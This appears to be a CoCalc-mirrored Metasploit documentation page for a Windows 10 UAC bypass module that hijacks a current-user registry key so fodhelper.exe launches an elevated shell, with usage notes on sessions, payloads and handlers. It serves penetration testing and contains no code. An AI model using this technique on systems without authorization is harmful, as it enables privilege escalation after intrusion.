CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
Views: 1904
Vulnerable Application
Introduction
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off.
This module modifies a registry key, but cleans up the key once the payload has been invoked.
The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
Usage
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the payload
and session
options. The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system. On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (set DISABLEPAYLOADHANDLER true
) and manually create a job handler corresponding to the payload.